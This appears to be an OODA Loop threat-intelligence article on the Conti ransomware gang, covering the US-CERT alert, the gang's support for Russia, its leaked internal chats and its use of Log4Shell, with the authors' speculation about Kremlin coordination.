Start your day with intelligence. Get The OODA Daily Pulse.
Informing your decisions with actionable intelligence
Start your day with intelligence. Get The OODA Daily Pulse.
Informing your decisions with actionable intelligence
The US-CERT National Cyber Awareness (NCAS), Alert AA21-265A entitled “Conti Ransomware” was first released on September 22, 2021.
The Alert was recently updated on February 28, 2022: “Conti cyber threat actors remain active and reported Conti ransomware attacks against the U.S. and international organizations have risen to more than 1,000. Notable attack vectors include Trickbot and Cobalt Strike.”
While Conti is considered a ransomware-as-a-service (RaaS) model ransomware variant, there is variation in its structure that differentiates it from a typical affiliate model. It is likely that Conti developers pay the deployers of the ransomware a wage rather than a percentage of the proceeds used by affiliate cyber actors and receives a share of the proceeds from a successful attack.
Conti actors often gain initial access [TA0001] to networks through:
While there are no specific or credible cyber threats to the U.S. homeland at this time, CISA, FBI, and NSA encourage organizations to review this advisory and apply the recommended mitigations.
In early February, We first provided an analysis of the cybercrime crackdown by Russian authorities, which included the arrest of members of the REvil Gang. Later, we learned that a REvil gang arrestee is tied to the 2021 Colonial Pipeline attack in the U.S. Overall, follow-up reports suggested a growing sentiment that the Russian authorities were out to optimize the appeasement value to the U.S. of this arrest. We later suggested that the REvil gang arrest (and offering up the individual connected to cyberattacks in the U.S.) was possibly a false flag.
Our suggested scenario at the time: The Russians gave up the REvil gang while still planning to lean on non-state actors within Russia for plausibly denial cyberwar operations against Ukraine and/or information war efforts which enable a ‘small footprint’ invasion of Ukraine. Our latter assumption has proven true. A few days ago, the Conti Gang announced their support for the Russian Government.
According to OODA CTO Bob Gourley: “This [announcement by Conti] leads to the logical conclusion that the Russian arrests of REvil and other crooks were not just a signal to the West that they had ransomware under control and would unleash them if they wanted, but was a way to ensure total cooperation of all criminal groups.”
Recorded Future Analyst Dmitry Smilyanets has confirmed the authenticity of conversations leaked by a Ukrainian member of the gang (who was not pleased with the announcement of support for Russia by Conti). The leaked conversations are the result of the Ukrainian member of the group hacking the gang’s internal Jabber/XMPP server. The leaked data contains 339 JSON files with log conversations from January 29, 2021, to February 27, 2022. The leaked data has been made available by security firm IntelligenceX and can be read online. (1)
As we reported back in December 2021 and according to Palo Alto Networks, the Conti Gang was the first ransomware group to weaponize Log4Shell with a full attack chain. Palo Alto Networks refers to the group “as one of the most ruthless ransomware groups known to be active.” Conti has been able to leverage the Log4Shell vulnerability quickly and develop the attack chain. While some experts have the perspective that most attackers have lost interest in Log4Shell as a tool for cyberattacks, other reports confirm that nation-state threat groups continue to exploit the vulnerability. As recently as December of last year, Log4Shell appeared in hacker chatter.
The potential here is that the Conti Gang has already achieved broad access to U.S. systems via the Log4Shell vulnerability – and is simply awaiting an order from the Kremlin to mount an offensive attack.
https://oodaloop.com/archive/2022/02/21/russia-ukraine-crisis-resources-for-the-crisis-management-team/
Conti Ransomware Gang Has Full Log4Shell Attack Chain
What’s Really Behind WhisperGate Attacks Against Ukraine?
Log4Shell Activity: Non-State Actors (Global)
Log4Shell Incidents and Mitigation Activities To-date: Governmental Agencies (Global)
Log4Shell Exploit Used in Cox Media Group Ransomware Attack Attributed to Iranian Hackers
Apache Log4j Vulnerability Discussed as part of The December 2021 OODA Network Member Meeting
Now more than ever, organizations need to apply rigorous thought to business risks and opportunities. In doing so it is useful to understand the concepts embodied in the terms Black Swan and Gray Rhino. See: Potential Future Opportunities, Risks and Mitigation Strategies in the Age of Continuous Crisis
Use OODA Loop to improve your decision-making in any competitive endeavor. Explore OODA Loop
The greatest determinant of your success will be the quality of your decisions. We examine frameworks for understanding and reducing risk while enabling opportunities. Topics include Black Swans, Gray Rhinos, Foresight, Strategy, Stratigames, Business Intelligence, and Intelligent Enterprises. Leadership in the modern age is also a key topic in this domain. Explore Decision Intelligence
We track the rapidly changing world of technology with a focus on what leaders need to know to improve decision-making. The future of tech is being created now and we provide insights that enable optimized action based on the future of tech. We provide deep insights into Artificial Intelligence, Machine Learning, Cloud Computing, Quantum Computing, Security Technology, Space Technology. Explore Disruptive/Exponential Tech
Security and resiliency topics include geopolitical and cyber risk, cyber conflict, cyber diplomacy, cybersecurity, nation-state conflict, non-nation state conflict, global health, international crime, supply chain, and terrorism. Explore Security and Resiliency
The OODA community includes a broad group of decision-makers, analysts, entrepreneurs, government leaders, and tech creators. Interact with and learn from your peers via online monthly meetings, OODA Salons, the OODAcast, in-person conferences, and an online forum. For the most sensitive discussions interact with executive leaders via a closed Wickr channel. The community also has access to a member-only video library. Explore The OODA Community
About the Author
Daniel Pereira is research director at OODA. He is a foresight strategist, creative technologist, and an information communication technology (ICT) and digital media researcher with 20+ years of experience directing public/private partnerships and strategic innovation initiatives.
Informing your decisions with actionable intelligence
Informing your decisions with actionable intelligence